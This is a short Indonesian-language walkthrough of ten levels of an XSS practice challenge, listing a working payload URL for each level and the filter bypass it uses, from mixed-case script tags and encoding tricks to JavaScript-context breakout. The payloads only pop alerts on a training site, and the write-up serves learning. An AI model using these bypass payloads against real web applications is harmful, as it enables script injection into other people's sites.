Dalam artikel ini kita akan membahas XSS Challenges dari zixem.altervista.org. Setiap level memiliki teknik bypass berbeda yang berguna untuk memahami cara kerja Cross-Site Scripting (XSS).

Level 1 – Basic Injection

http://www.zixem.altervista.org/XSS/1.php?name=<script>alert(1337)</script>

Level 2 – Case Insensitive

http://www.zixem.altervista.org/XSS/2.php?name=<ScRIpt>alert(1337)</SCript>

Level 3 – Escaping %0A (newline)

http://zixem.altervista.org/XSS/3.php?name=%0a<svg/onload="alert(1337)">

Level 4 – Image Error Injection

<img src='htp.pngd' onerror=alert(1337) />

http://zixem.altervista.org/XSS/4.php?img=htp.pngd'onerror=alert(1337)%20

Level 5 – JavaScript in Form Action

<form action="javascript:alert(1337)" method='get'>

http://zixem.altervista.org/XSS/5.php?name=x&action=javascript:alert(1337)

Level 6 – Hex Encoding

node
new Buffer.from('<').toString('hex')

http://zixem.altervista.org/XSS/6.php?name=zxmx3csvg/onload=alert(1337)x3e

Level 7 – Double URL Encoding

node
encodeURIComponent(encodeURIComponent('<>'))

http://zixem.altervista.org/XSS/7.php?name=zxm%253csvg/onload=alert(1337)%253e

Level 8 – Unicode Encoding

http://www.zixem.altervista.org/XSS/8.php?name=zxm%u003Csvg/Onload=prompt()//

Level 9 – Mixed Case SVG

http://zixem.altervista.org/XSS/9.php?name=zxm<SVg/onload=confirm(1337)>

Level 10 – JavaScript Context Injection

http://zixem.altervista.org/XSS/10.php?name=zxm');onerror=alert;throw 1337;//
http://zixem.altervista.org/XSS/10.php?name=zxm');onerror=confirm`1337`;//

Setiap level mengajarkan cara berbeda dalam melakukan bypass filter. Mulai dari basic script tag, encoding, hingga eksploitasi konteks JavaScript. Latihan seperti ini sangat bermanfaat untuk memahami bagaimana XSS bisa terjadi dan bagaimana cara mencegahnya.